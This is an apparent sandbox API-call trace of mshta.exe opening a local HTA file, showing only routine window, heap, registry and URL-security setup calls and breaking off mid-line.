[0222.593] IsWindow (hWnd=0x0) returned 0 [0222.593] RegisterClassW (lpWndClass=0x1ef8cc) returned 0xc14d [0222.593] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xb40000, lpParam=0x74479680) returned 0x40110 [0222.594] NtdllDefWindowProc_W () returned 0x0 [0222.594] NtdllDefWindowProc_W () returned 0x1 [0222.594] NtdllDefWindowProc_W () returned 0x0 [0222.596] NtdllDefWindowProc_W () returned 0x0 [0222.596] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x40110, hMenu=0x0, hInstance=0xb40000, lpParam=0x74479680) returned 0x20160 [0222.596] NtdllDefWindowProc_W () returned 0x0 [0222.596] NtdllDefWindowProc_W () returned 0x1 [0222.596] NtdllDefWindowProc_W () returned 0x0 [0222.597] NtdllDefWindowProc_W () returned 0x0 [0222.597] SetWindowLongW (hWnd=0x20160, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0222.597] NtdllDefWindowProc_W () returned 0x0 [0222.597] NtdllDefWindowProc_W () returned 0x0 [0222.597] NtdllDefWindowProc_W () returned 0x0 [0222.597] NtdllDefWindowProc_W () returned 0x0 [0222.597] NtdllDefWindowProc_W () returned 0x0 [0222.597] NtdllDefWindowProc_W () returned 0x0 [0222.598] SetWindowPos (hWnd=0x20160, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0222.598] NtdllDefWindowProc_W () returned 0x0 [0222.598] NtdllDefWindowProc_W () returned 0x0 [0222.598] NtdllDefWindowProc_W () returned 0x0 [0222.598] NtdllDefWindowProc_W () returned 0x0 [0222.599] NtdllDefWindowProc_W () returned 0x0 [0222.599] SendMessageW (hWnd=0x20160, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0222.599] NtdllDefWindowProc_W () returned 0x0 [0222.599] NtdllDefWindowProc_W () returned 0x0 [0222.599] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x22) returned 0x5acf48 [0222.599] PathRemoveArgsW (in: pszPath="\"C:\\info.hta\" " | out: pszPath="\"C:\\info.hta\"") [0222.599] PathRemoveBlanksW (in: pszPath="\"C:\\info.hta\"" | out: pszPath="\"C:\\info.hta\"") [0222.599] PathUnquoteSpacesW (in: lpsz="\"C:\\info.hta\"" | out: lpsz="C:\\info.hta") returned 1 [0222.600] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\info.hta", ppmk=0x1ef92c*=0x0, dwFlags=0x1 | out: ppmk=0x1ef92c*=0x5a0570) returned 0x0 [0222.605] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5acf48 | out: hHeap=0x590000) returned 1 [0222.605] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bda58 [0222.605] CoCreateInstance (in: rclsid=0x74079770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x740fb75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x744796d4 | out: ppv=0x744796d4*=0x5c1650) returned 0x0 [0222.609] DllGetClassObject (in: rclsid=0x5bf51c*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x74caee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1eebe4 | out: ppv=0x1eebe4*=0x74478cb0) returned 0x0 [0222.687] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a8) returned 0x5c0318 [0222.835] GetCurrentThreadId () returned 0x36c [0222.942] RegisterClassExW (param_1=0x1eea7c) returned 0xc14e [0222.942] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc14e, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x73f40000, lpParam=0x0) returned 0x20168 [0222.942] GetWindowLongW (hWnd=0x20168, nIndex=-20) returned 0 [0222.943] NtdllDefWindowProc_W () returned 0x1 [0222.943] NtdllDefWindowProc_W () returned 0x0 [0222.943] NtdllDefWindowProc_W () returned 0x0 [0222.943] NtdllDefWindowProc_W () returned 0x0 [0222.943] NtdllDefWindowProc_W () returned 0x0 [0222.943] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdb30 [0222.943] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdb48 [0222.943] CreateCompatibleDC (hdc=0x0) returned 0x80106e7 [0222.943] GetDeviceCaps (hdc=0x80106e7, index=90) returned 96 [0222.943] GetDeviceCaps (hdc=0x80106e7, index=88) returned 96 [0222.943] GetSystemMetrics (nIndex=68) returned 4 [0222.943] GetSystemMetrics (nIndex=69) returned 4 [0222.943] GetSystemMetrics (nIndex=2) returned 17 [0222.943] GetSystemMetrics (nIndex=3) returned 17 [0222.943] GetStockObject (i=13) returned 0x18a002e [0222.943] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x18a002e [0222.943] GetTextMetricsW (in: hdc=0x80106e7, lptm=0x1eeb14 | out: lptm=0x1eeb14) returned 1 [0222.943] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x18a002e [0222.943] DeleteObject (ho=0x18a002e) returned 1 [0222.943] GetSystemDefaultLCID () returned 0x409 [0222.943] GetUserDefaultLCID () returned 0x409 [0222.943] GetACP () returned 0x4e4 [0222.943] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x1eea88, cchData=41 | out: lpLCData="1") returned 2 [0222.944] _wtoi (_String="1") returned 1 [0222.944] RegCloseKey (hKey=0x0) returned 0x6 [0222.944] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x1eeadc, cchData=16 | out: lpLCData="0123456789") returned 11 [0222.944] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7447b038, fWinIni=0x0 | out: pvParam=0x7447b038) returned 1 [0222.944] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x1eeb50, fWinIni=0x0 | out: pvParam=0x1eeb50) returned 1 [0222.944] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc0) returned 0x5c06d0 [0222.944] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdb60 [0222.944] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa4) returned 0x5c0798 [0222.944] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b32c0 [0222.944] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x5ba908 [0222.944] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a9090 [0222.944] GetSystemWindowsDirectoryW (in: lpBuffer=0x1ee95c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0222.944] lstrlenW (lpString="C:\\Windows") returned 10 [0222.944] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0222.944] CreateActCtxW (pActCtx=0x1ee938) returned 0x5c084c [0222.945] ActivateActCtx (in: hActCtx=0x5c084c, lpCookie=0x1ee908 | out: hActCtx=0x5c084c, lpCookie=0x1ee908) returned 1 [0222.945] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74720000 [0222.948] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1a930001) returned 1 [0222.949] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0222.949] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0222.949] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0222.949] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0222.949] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ee568, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0222.949] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ee770, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0222.949] GetCurrentProcess () returned 0xffffffff [0222.949] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x1ee978, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0222.950] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0222.950] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b32e0 [0222.950] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0222.950] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x1ee554, pvData=0x1ee560, pcbData=0x1ee55c*=0x4 | out: pdwType=0x1ee554*=0x0, pvData=0x1ee560, pcbData=0x1ee55c*=0x4) returned 0x2 [0222.950] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ee4cc | out: phkResult=0x1ee4cc*=0x158) returned 0x0 [0222.950] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ee4d0 | out: phkResult=0x1ee4d0*=0x154) returned 0x0 [0222.950] RegOpenKeyExW (in: hKey=0x154, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ee48c | out: phkResult=0x1ee48c*=0x0) returned 0x2 [0222.950] RegOpenKeyExW (in: hKey=0x158, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ee48c | out: phkResult=0x1ee48c*=0x0) returned 0x2 [0222.950] RegCloseKey (hKey=0x0) returned 0x6 [0222.950] RegCloseKey (hKey=0x0) returned 0x6 [0222.950] RegCloseKey (hKey=0x158) returned 0x0 [0222.950] RegCloseKey (hKey=0x154) returned 0x0 [0222.950] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x97c) returned 0x5c1650 [0222.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x480) returned 0x5c1fd8 [0222.951] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.951] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.951] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.951] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5c11d0 [0222.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5c1228 [0222.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5c2460 [0222.951] GetCurrentThreadId () returned 0x36c [0222.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdc20 [0222.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5ad658 [0222.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x80) returned 0x5c24b8 [0222.951] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc14f [0222.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x5b3300 [0223.045] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0223.046] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x74478cd4, dwReserved=0x0 | out: ppSM=0x74478cd4*=0x5c2540) returned 0x0 [0223.049] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x64) returned 0x5c2f18 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5c2f88 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x5acfd8 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b3320 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a90e0 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a9130 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x60) returned 0x5c2b10 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x64) returned 0x5c2b78 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a9180 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x60) returned 0x5c2be8 [0223.065] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xec) returned 0x5c2fe8 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a91d0 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a9220 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a9270 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x60) returned 0x5c2c50 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x60) returned 0x5c2cb8 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a92c0 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a9310 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x90) returned 0x5c30e0 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x140) returned 0x5c3178 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5bb5f0 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x5ad008 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x5b3340 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd0) returned 0x5bbe28 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x38) returned 0x5c1280 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x128) returned 0x5c32c0 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x148) returned 0x5c33f0 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x5c) returned 0x5c3540 [0223.066] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x5b3360 [0223.066] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x1ee87c | out: ppURI=0x1ee87c*=0x5bb834) returned 0x0 [0223.067] IUri:GetPropertyDWORD (in: This=0x5bb834, uriProp=0x11, pdwProperty=0x1ee864, dwFlags=0x0 | out: pdwProperty=0x1ee864*=0x11) returned 0x0 [0223.067] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x5c1d84, dwReserved=0x0 | out: ppSM=0x5c1d84*=0x5c35a8) returned 0x0 [0223.105] IInternetSecurityManager:SetSecuritySite (This=0x5c35a8, pSite=0x5c1d8c) returned 0x0 [0223.105] IUnknown:AddRef (This=0x5c1d8c) returned 0x28 [0223.105] IUnknown:QueryInterface (in: This=0x5c1d8c, riid=0x753261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x1ee834 | out: ppvObject=0x1ee834*=0x5c1d90) returned 0x0 [0223.105] IServiceProvider:QueryService (in: This=0x5c1d90, guidService=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x5c35d0 | out: ppvObject=0x5c35d0*=0x0) returned 0x80004002 [0223.105] IServiceProvider:QueryService (in: This=0x5c1d90, guidService=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x5c35cc | out: ppvObject=0x5c35cc*=0x0) returned 0x80004002 [0223.105] IServiceProvider:QueryService (in: This=0x5c1d90, guidService=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5c35c8 | out: ppvObject=0x5c35c8*=0x0) returned 0x80004002 [0223.105] IUnknown:Release (This=0x5c1d90) returned 0x0 [0223.105] IInternetSecurityManager:GetSecurityId (in: This=0x5c35a8, pwszUrl="about:blank", pbSecurityId=0x1ee8d0, pcbSecurityId=0x1ee8c4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ee8d0*=0x61, pcbSecurityId=0x1ee8c4*=0xf) returned 0x0 [0223.198] DllGetClassObject (in: rclsid=0x5bf550*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x1ede50*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ed508 | out: ppv=0x1ed508*=0x74478c70) returned 0x0 [0223.199] IUnknown:AddRef (This=0x74478c70) returned 0x1 [0223.199] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.199] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ee0cc | out: ppvObject=0x1ee0cc*=0x74478c70) returned 0x0 [0223.199] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.199] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1ee28c | out: ppvObject=0x1ee28c*=0x74478c7c) returned 0x0 [0223.199] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.199] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x5b3420, cchResult=0xc, pcchResult=0x1ee2d4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x1ee2d4*=0xc) returned 0x0 [0223.199] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5c4230 [0223.199] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.199] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c4230 | out: hHeap=0x590000) returned 1 [0223.199] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.199] DllGetClassObject (in: rclsid=0x5bf550*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ee1a0 | out: ppv=0x1ee1a0*=0x74478c70) returned 0x0 [0223.199] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1ee28c | out: ppvObject=0x1ee28c*=0x74478c7c) returned 0x0 [0223.200] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.200] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x5b3420, cchResult=0xc, pcchResult=0x1ee2e4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x1ee2e4*=0x0) returned 0x800c0011 [0223.200] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.200] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.200] IUnknown:Release (This=0x5bb834) returned 0x2 [0223.200] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.200] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xf) returned 0x5bdc80 [0223.200] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdcc8 [0223.200] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x1ee8a4, dwReserved=0x0 | out: ppSM=0x1ee8a4*=0x5c3b08) returned 0x0 [0223.200] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xf) returned 0x5bdce0 [0223.200] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5c3a50 [0223.201] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1eea54 | out: phkResult=0x1eea54*=0x198) returned 0x0 [0223.201] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1eea58 | out: phkResult=0x1eea58*=0x1a4) returned 0x0 [0223.201] RegOpenKeyExW (in: hKey=0x1a4, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x1eea14 | out: phkResult=0x1eea14*=0x0) returned 0x2 [0223.201] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x1eea14 | out: phkResult=0x1eea14*=0x0) returned 0x2 [0223.201] RegCloseKey (hKey=0x0) returned 0x6 [0223.201] RegCloseKey (hKey=0x0) returned 0x6 [0223.201] RegCloseKey (hKey=0x198) returned 0x0 [0223.201] RegCloseKey (hKey=0x1a4) returned 0x0 [0223.201] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x128) returned 0x5c9190 [0223.201] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5c3b70 [0223.201] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdd10 [0223.201] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2000) returned 0x5c92c0 [0223.202] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5c3bc8 [0223.202] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3bc8 | out: hHeap=0x590000) returned 1 [0223.202] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.202] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x1ee898 | out: ppURI=0x1ee898*=0x5bb834) returned 0x0 [0223.202] DllGetClassObject (in: rclsid=0x5bf550*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ee170 | out: ppv=0x1ee170*=0x74478c70) returned 0x0 [0223.202] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1ee25c | out: ppvObject=0x1ee25c*=0x74478c7c) returned 0x0 [0223.202] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.203] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x5b3420, cchResult=0xc, pcchResult=0x1ee2a4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x1ee2a4*=0xc) returned 0x0 [0223.203] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5c4230 [0223.203] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.203] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c4230 | out: hHeap=0x590000) returned 1 [0223.203] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.203] DllGetClassObject (in: rclsid=0x5bf550*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ee170 | out: ppv=0x1ee170*=0x74478c70) returned 0x0 [0223.203] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1ee25c | out: ppvObject=0x1ee25c*=0x74478c7c) returned 0x0 [0223.203] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.203] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x5b3420, cchResult=0xc, pcchResult=0x1ee2b4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x1ee2b4*=0x0) returned 0x800c0011 [0223.203] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.203] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.203] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.203] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.203] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 